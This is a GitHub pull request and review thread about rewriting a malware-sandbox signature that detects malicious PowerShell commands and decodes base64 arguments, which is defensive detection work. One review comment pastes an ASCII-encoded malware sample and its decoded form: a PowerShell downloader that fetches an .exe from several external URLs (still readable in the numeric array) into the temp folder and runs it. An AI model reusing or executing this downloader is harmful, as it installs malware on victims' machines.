### PR TITLE
Rewrite of Powershell command signature

### PR DESCRIPTION
**Pull request by kevross33**
This signature as it stands in its current form was not working. Took matches from it and now instead of a lit of anomalies just dumps the powershell command (for now) which I think is more useful.

Also implemented a base64 decoding function which while not perfect should be able to extract and present decoded base64 strings although this requires it is following a base64 string so for instance "-enc BASE64" not a variable like "$content = BASE64 -enc $content". A solution to this would be extract and decode all base64 strings but with evasion, dosfuscation etc. this may be difficult. As such between this signature and some of the command line signatures most suspicious powershell commands are detected IF they are using these features or obfuscation.

I will improve this signature over time. I did consider attempting my first ML project with this after being inspired here https://www.fireeye.com/blog/threat-research/2018/07/malicious-powershell-detection-via-machine-learning.html but I think this is not entirely necessary the now as enough detections exist and also I don't have enough malicious and varied examples of malicious powershell commands let alone real world benign examples for training and edge cases.

Another note is that because of obfsucation ordering does not matter and it is common to see a command line now build out powershell commands and arguments into variables before the next command calls an extremely obfuscated command as powershell executes but it is too obfuscated to match on (curtain obviously will resolve this once matching is added to this signature). For now though we don't care about ordering just that the terms exist in the command line so cmd.exe $1 = -enc $2= pOwErShell will still detect it as a powershell command.

### CODE REVIEW

**Comment by kevross33** [comment]
Now I am tempted to apply ascii deobfuscation too although I see it rarely now :D

test = [36 , 119,115 ,99,114 , 105 ,112,116, 32 ,61,32, 110 , 101 , 119 , 45, 111,98, 106 , 101,99, 116, 32 , 45,67 , 111,109,79,98 , 106 ,101 , 99,116 , 32 ,87 , 83,99,114,105 , 112 ,116 , 46 , 83, 104 , 101,108 , 108, 59 ,36 ,119, 101, 98, 99,108 ,105,101,110, 116 ,32,61, 32 ,110,101 , 119 , 45 , 111 ,98,106, 101, 99,116,32,83, 121, 115, 116, 101 , 109 , 46 ,78 ,101, 116, 46,87,101 ,98 ,67, 108 , 105 ,101,110, 116 ,59, 36 ,114, 97 ,110,100 ,111, 109, 32,61 , 32,110, 101 , 119, 45 , 111,98,106, 101,99,116, 32 , 114,97, 110, 100,111, 109, 59 ,36, 117 , 114 , 108 ,115 , 32, 61,32, 39,104 ,116, 116,112 , 58,47 , 47, 119 ,101,98, 112,114 ,111,106 , 46 , 99 ,111 ,109, 46 , 98, 114,47, 108,120, 80, 47 , 44 ,104 ,116 , 116,112,58,47, 47, 113 ,117 , 111 , 118 , 97,100 ,105 , 115, 46,113 ,99 , 46 , 99, 97 ,47 ,89 , 105, 67, 47 ,44, 104, 116, 116 ,112 ,58 , 47, 47 , 99,117 , 115 ,116,104, 101, 108 , 112, 46, 99 , 111 ,46, 117 , 107, 47, 106 , 82,68, 122 , 104 ,67,105,114, 73 , 47, 44,104 , 116, 116, 112, 58, 47 , 47 ,104 ,98 , 116 , 112,104 , 111,116 ,111 ,103 , 114 , 97 , 112 , 104, 121 ,46 , 99, 111 ,109, 47,71 ,110,113 , 73, 115 ,47, 44 ,104,116,116 , 112,58 ,47 ,47 , 116 ,97, 121 ,108, 111 , 114,112 ,101 , 109, 98 , 101, 114 , 116,111, 110,46 ,99,111 , 109,47,80 ,85 ,90, 66 ,86 ,47,39, 46 , 83, 112 , 108 , 105, 116 , 40 , 39 , 44,39,41,59, 36 ,110, 97, 109,101 ,32, 61 , 32 ,36 ,114 , 97,110 ,100 , 111 , 109,46 ,110,101,120 , 116,40,49,44, 32,54 , 53 , 53 ,51,54, 41 , 59,36,112, 97, 116 , 104, 32, 61,32, 36 ,101, 110 , 118 ,58,116,101,109, 112,32, 43,32,39, 92,39 ,32 ,43 , 32 ,36 , 110 ,97 ,109, 101,32, 43, 32 , 39, 46,101 , 120,101,39, 59, 102 , 111 , 114 , 101 ,97 ,99,104,40,36 ,117 ,114,108 ,32 , 105, 110 ,32, 36 , 117 , 114 , 108, 115,41 , 123,116 , 114, 121 , 123 ,36 , 119,101 , 98,99,108 , 105, 101 , 110 , 116, 46 , 68 , 111, 119 ,110,108, 111 , 97 ,100, 70,105 ,108 ,101 ,40,36, 117,114,108,46, 84 ,111 , 83 ,116 , 114 , 105,110 , 103 ,40 , 41,44, 32,36 ,112 ,97,116 ,104,41, 59 ,83 , 116 ,97 , 114,116 ,45,80 ,114,111 ,99,101 , 115 , 115 ,32, 36, 112,97,116 ,104, 59 ,98 ,114 ,101, 97,107 ,59 ,125 , 99,97,116 ,99 , 104, 123,119, 114,105,116, 101 ,45 , 104 , 111 ,115, 116,32 ,36, 95 , 46 , 69, 120,99, 101,112, 116 , 105,111,110 ,46 ,77 ,101 , 115,115 , 97 ,103,101 , 59 , 125, 125]
>>> ''.join(map(chr,test))
"$wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://REMOVED/lxP/,http://REMOVED/YiC/,http://REMOVED/jRDzhCirI/,http://REMOVED/GnqIs/,http://tREMOVED/PUZBV/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}"

**Comment by doomedraven** [comment]
that is part of curtain already, don't duplicate the effort ;)

**Comment by kevross33** [comment]
I guess :-) I need to get some sigs off curtain data written too in order to highlight the matches (i.e. downloader behaviour) in signatures. Between the command line signatures, this sig and curtain (with sigs to be done) good layering going of detection of powershell and command line obfuscation and malicious use :D

**Comment by doomedraven** [comment]
curtain is processsing so you can access from signatures to check alter text for example

**Pull request merged**
